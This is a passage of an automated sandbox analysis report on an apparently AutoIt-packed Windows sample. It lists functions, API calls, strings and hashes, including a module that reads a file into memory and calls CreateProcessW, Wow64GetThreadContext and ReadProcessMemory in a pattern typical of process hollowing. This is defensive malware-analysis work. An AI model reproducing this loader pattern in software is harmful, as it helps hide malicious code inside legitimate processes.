                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                    • Opcode ID: a98319bb233da5907eb7279b9dba1a3cc6798c96d7a9049aefe0f3f2faeb8e24
                                                                                                                    • Instruction ID: 930318ec6a81bdee27139512409f9208c510215542d35c134ba7adde0ebb0dd3
                                                                                                                    • Opcode Fuzzy Hash: a98319bb233da5907eb7279b9dba1a3cc6798c96d7a9049aefe0f3f2faeb8e24
                                                                                                                    • Instruction Fuzzy Hash: 05214D70D00354AFEB22DFA4EC89B9D7BB8FB08715F000629E600AA2E1D3B655408F94
                                                                                                                    Function 00323766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R>
                                                                                                                    • API String ID: 1825951767-1421681191
                                                                                                                    • Opcode ID: 79d8154b9923b8beccccc1a2e27d2a16ee1e97924c95b0c02cefcbfdaddfd35f
                                                                                                                    • Instruction ID: 6c38f60c55c3163be5445f70b8b02ca4ed598437885d6c93ace3760e8d025a7d
                                                                                                                    • Opcode Fuzzy Hash: 79d8154b9923b8beccccc1a2e27d2a16ee1e97924c95b0c02cefcbfdaddfd35f
                                                                                                                    • Instruction Fuzzy Hash: 2EA13E7291022DAACB16EBA4EC91EEEB77CFF15310F440529F415BB191DF746A48CBA0
                                                                                                                    Function 0032F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00340162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00340193
                                                                                                                      • Part of subcall function 00340162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0034019B
                                                                                                                      • Part of subcall function 00340162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003401A6
                                                                                                                      • Part of subcall function 00340162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003401B1
                                                                                                                      • Part of subcall function 00340162: MapVirtualKeyW.USER32(00000011,00000000), ref: 003401B9
                                                                                                                      • Part of subcall function 00340162: MapVirtualKeyW.USER32(00000012,00000000), ref: 003401C1
                                                                                                                      • Part of subcall function 003360F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0032F930), ref: 00336154
                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0032F9CD
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0032FA4A
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 003645C8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                    • String ID: <W>$\T>$%;$S>
                                                                                                                    • API String ID: 1986988660-1435292849
                                                                                                                    • Opcode ID: a7a2d6fd6457e479af4694e33ffd44447a461fe74ea1675eb4f6e1d1ece8ef72
                                                                                                                    • Instruction ID: 2cdf8dee0c183ce6f77b469461dc7beb25ac156779e47a816b5b8166bc7eb5ab
                                                                                                                    • Opcode Fuzzy Hash: a7a2d6fd6457e479af4694e33ffd44447a461fe74ea1675eb4f6e1d1ece8ef72
                                                                                                                    • Instruction Fuzzy Hash: 7B81A1B4905AD4CEC3A7DF2AA9C16597BEDFB5930EF90832A9119CF2E1E77044848F11
                                                                                                                    Function 01239BB0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 983 1239bb0-1239c5e call 12375c0 986 1239c65-1239c8b call 123aac0 CreateFileW 983->986 989 1239c92-1239ca2 986->989 990 1239c8d 986->990 998 1239ca4 989->998 999 1239ca9-1239cc3 VirtualAlloc 989->999 991 1239ddd-1239de1 990->991 992 1239e23-1239e26 991->992 993 1239de3-1239de7 991->993 995 1239e29-1239e30 992->995 996 1239df3-1239df7 993->996 997 1239de9-1239dec 993->997 1000 1239e32-1239e3d 995->1000 1001 1239e85-1239e9a 995->1001 1002 1239e07-1239e0b 996->1002 1003 1239df9-1239e03 996->1003 997->996 998->991 1004 1239cc5 999->1004 1005 1239cca-1239ce1 ReadFile 999->1005 1008 1239e41-1239e4d 1000->1008 1009 1239e3f 1000->1009 1010 1239eaa-1239eb2 1001->1010 1011 1239e9c-1239ea7 VirtualFree 1001->1011 1012 1239e1b 1002->1012 1013 1239e0d-1239e17 1002->1013 1003->1002 1004->991 1006 1239ce3 1005->1006 1007 1239ce8-1239d28 VirtualAlloc 1005->1007 1006->991 1014 1239d2a 1007->1014 1015 1239d2f-1239d4a call 123ad10 1007->1015 1016 1239e61-1239e6d 1008->1016 1017 1239e4f-1239e5f 1008->1017 1009->1001 1011->1010 1012->992 1013->1012 1014->991 1023 1239d55-1239d5f 1015->1023 1020 1239e7a-1239e80 1016->1020 1021 1239e6f-1239e78 1016->1021 1019 1239e83 1017->1019 1019->995 1020->1019 1021->1019 1024 1239d92-1239da6 call 123ab20 1023->1024 1025 1239d61-1239d90 call 123ad10 1023->1025 1031 1239daa-1239dae 1024->1031 1032 1239da8 1024->1032 1025->1023 1033 1239db0-1239db4 CloseHandle 1031->1033 1034 1239dba-1239dbe 1031->1034 1032->991 1033->1034 1035 1239dc0-1239dcb VirtualFree 1034->1035 1036 1239dce-1239dd7 1034->1036 1035->1036 1036->986 1036->991
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01239C81
                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01239EA7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2165997295.0000000001237000.00000040.00000020.00020000.00000000.sdmp, Offset: 01237000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1237000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFileFreeVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 204039940-0
                                                                                                                    • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                    • Instruction ID: 578224c3a93981783866bc1cf12cbbfbd78bd78af1749b458ca0a2f83d0c626d
                                                                                                                    • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                    • Instruction Fuzzy Hash: BFA12CB0E10209EBDF14DF94C859BEEBBB5BF89304F108559E205BB280D7B55A81CF64
                                                                                                                    Function 003239D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1114 3239d5-323a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00323A03
                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00323A24
                                                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00323A38
                                                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00323A41
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateShow
                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                    • Opcode ID: ee979bcd48ef49b0b7c115d2408c09e17e4663015356e22a3446094f5f82bb8c
                                                                                                                    • Instruction ID: 82ac63f0fe6ef262c46a82376c3ba5162bf907bb6a0c28fcc2f9fc0795c27e3f
                                                                                                                    • Opcode Fuzzy Hash: ee979bcd48ef49b0b7c115d2408c09e17e4663015356e22a3446094f5f82bb8c
                                                                                                                    • Instruction Fuzzy Hash: F6F03A706002D07EEA325763AC88E7B3E7DD7C7F54F00062EBB00AA1B1C2610840CAB0
                                                                                                                    Function 01239970 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1467 1239970-1239aa6 call 12375c0 call 1239860 CreateFileW 1474 1239aa8 1467->1474 1475 1239aad-1239abd 1467->1475 1476 1239b5d-1239b62 1474->1476 1478 1239ac4-1239ade VirtualAlloc 1475->1478 1479 1239abf 1475->1479 1480 1239ae2-1239af9 ReadFile 1478->1480 1481 1239ae0 1478->1481 1479->1476 1482 1239afb 1480->1482 1483 1239afd-1239b37 call 12398a0 call 1238860 1480->1483 1481->1476 1482->1476 1488 1239b53-1239b5b ExitProcess 1483->1488 1489 1239b39-1239b4e call 12398f0 1483->1489 1488->1476 1489->1488
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 01239860: Sleep.KERNELBASE(000001F4), ref: 01239871
                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01239A9C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2165997295.0000000001237000.00000040.00000020.00020000.00000000.sdmp, Offset: 01237000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1237000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFileSleep
                                                                                                                    • String ID: 1MR2YTJJIV7S10NZT6PJ4
                                                                                                                    • API String ID: 2694422964-887113866
                                                                                                                    • Opcode ID: 6cfdcefd86aaec6cf9a00f12edbff3afeeac702de2479869c17c9b80e47d6c93
                                                                                                                    • Instruction ID: 721cecf3b287e8f769fe3674c8ed70182e833002ba2fcfc4a48c6146b384a420
                                                                                                                    • Opcode Fuzzy Hash: 6cfdcefd86aaec6cf9a00f12edbff3afeeac702de2479869c17c9b80e47d6c93
                                                                                                                    • Instruction Fuzzy Hash: B551C371D1424CDBEF11DBA4C854BEEBB78AF59304F004199E248BB2C0D7B91B85CBA6
                                                                                                                    Function 0032407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1491 32407c-324092 1492 324098-3240ad call 327a16 1491->1492 1493 32416f-324173 1491->1493 1496 3240b3-3240d3 call 327bcc 1492->1496 1497 35d3c8-35d3d7 LoadStringW 1492->1497 1499 35d3e2-35d3fa call 327b2e call 326fe3 1496->1499 1501 3240d9-3240dd 1496->1501 1497->1499 1509 3240ed-32416a call 342de0 call 32454e call 342dbc Shell_NotifyIconW call 325904 1499->1509 1513 35d400-35d41e call 327cab call 326fe3 call 327cab 1499->1513 1503 3240e3-3240e8 call 327b2e 1501->1503 1504 324174-32417d call 328047 1501->1504 1503->1509 1504->1509 1509->1493 1513->1509
                                                                                                                    APIs
                                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0035D3D7
                                                                                                                      • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
                                                                                                                    • _memset.LIBCMT ref: 003240FC
                                                                                                                    • _wcscpy.LIBCMT ref: 00324150
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00324160
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                    • String ID: Line:
                                                                                                                    • API String ID: 3942752672-1585850449
                                                                                                                    • Opcode ID: d12ddb53af8bb4405d6ec91bb77447368e2265f3ed47cd2379f8bbbcb8454f1d
                                                                                                                    • Instruction ID: 828d8df52fcacc4af7873b6379011a3be57a04e1c5769d3f6fb3a87da2a9a372
                                                                                                                    • Opcode Fuzzy Hash: d12ddb53af8bb4405d6ec91bb77447368e2265f3ed47cd2379f8bbbcb8454f1d
                                                                                                                    • Instruction Fuzzy Hash: 80318D71108764AED733EB60EC46FDB77ECAF44314F104A1AF6859A0E1DB70A648CB92
                                                                                                                    Function 0034541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1559183368-0
                                                                                                                    • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                    • Instruction ID: e3d4d056c93a8e1ed5e6521fb70b6eb6353623ad2d8ecfa046f4f9421ed6fbce
                                                                                                                    • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                    • Instruction Fuzzy Hash: 7551D630E00B059BCB268FA9D84057E77E6EF42321F258769F8269E6D2D770BD548B40
                                                                                                                    Function 0032686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00324DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00324E0F
                                                                                                                    • _free.LIBCMT ref: 0035E263
                                                                                                                    • _free.LIBCMT ref: 0035E2AA
                                                                                                                      • Part of subcall function 00326A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00326BAD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                    • API String ID: 2861923089-1757145024
                                                                                                                    • Opcode ID: cdc76b1e3eb435d69d9730744167e7d070f2c1199d5d896dea473463e63a5db9
                                                                                                                    • Instruction ID: 24bcdf195de0d56051ddcf297467a2233e48f5e5fb9216f159f489de962d4277
                                                                                                                    • Opcode Fuzzy Hash: cdc76b1e3eb435d69d9730744167e7d070f2c1199d5d896dea473463e63a5db9
                                                                                                                    • Instruction Fuzzy Hash: 61916E719102299FCF0AEFA5DC819EDB7B8FF09311F10446AF815AF2A1DB70AA55CB50
                                                                                                                    Function 003235B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003235A1,SwapMouseButtons,00000004,?), ref: 003235D4
                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,003235A1,SwapMouseButtons,00000004,?,?,?,?,00322754), ref: 003235F5
                                                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,003235A1,SwapMouseButtons,00000004,?,?,?,?,00322754), ref: 00323617
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID: Control Panel\Mouse
                                                                                                                    • API String ID: 3677997916-824357125
                                                                                                                    • Opcode ID: cb1060260eaad4faba618a82a149d010cb352adbf5f65a2aacac59899ab2714a
                                                                                                                    • Instruction ID: d63e0cd098d518cc929ecc327d0ac75130fa1e4414ee29212a1595141617fad2
                                                                                                                    • Opcode Fuzzy Hash: cb1060260eaad4faba618a82a149d010cb352adbf5f65a2aacac59899ab2714a
                                                                                                                    • Instruction Fuzzy Hash: 54114571614228BFDB22CFA4EC80AAEBBBCEF05740F018469E805D7210E2759E409BA0
                                                                                                                    Function 01238860 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 0123908D
                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 012390B1
                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 012390D3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2165997295.0000000001237000.00000040.00000020.00020000.00000000.sdmp, Offset: 01237000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1237000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2438371351-0
                                                                                                                    • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                                                    • Instruction ID: 4e13c87e0b5033be2fee9aa3e883db64f1eb2d2ecb12db9ca13a3d9f2341643b
                                                                                                                    • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                                                    • Instruction Fuzzy Hash: 1B622F70A24658DBEB24CFA4C841BDEB371EF99304F1091A9D20DEB390E7B59E81CB55
                                                                                                                    Function 0038955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00324EE5: _fseek.LIBCMT ref: 00324EFD
                                                                                                                      • Part of subcall function 00389734: _wcscmp.LIBCMT ref: 00389824
                                                                                                                      • Part of subcall function 00389734: _wcscmp.LIBCMT ref: 00389837
                                                                                                                    • _free.LIBCMT ref: 003896A2
                                                                                                                    • _free.LIBCMT ref: 003896A9
                                                                                                                    • _free.LIBCMT ref: 00389714
                                                                                                                      • Part of subcall function 00342D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00349A24), ref: 00342D69
                                                                                                                      • Part of subcall function 00342D55: GetLastError.KERNEL32(00000000,?,00349A24), ref: 00342D7B
                                                                                                                    • _free.LIBCMT ref: 0038971C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1552873950-0
                                                                                                                    • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                                    • Instruction ID: b35cbeaa767e22e1ab65e53953443a05850d820e519b886d4bb16bb0790d8b78
                                                                                                                    • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                                    • Instruction Fuzzy Hash: D95141B1D04258AFDF259F64DC81AAEBBB9EF48300F14449EF609AB241DB715A80CF58
                                                                                                                    Function 0034470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2782032738-0
                                                                                                                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                    • Instruction ID: d1278c7cf3c55a8979536414c4dcb552b3b8c52ee96c37b06008db38bba4772e
                                                                                                                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                    • Instruction Fuzzy Hash: 3C41E674B007459BDB1ACF69C880AAE7BE5EF42360B25813DE825CF640EB71FD418B40
                                                                                                                    Function 003244A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 003244CF
                                                                                                                      • Part of subcall function 0032407C: _memset.LIBCMT ref: 003240FC
                                                                                                                      • Part of subcall function 0032407C: _wcscpy.LIBCMT ref: 00324150
                                                                                                                      • Part of subcall function 0032407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00324160
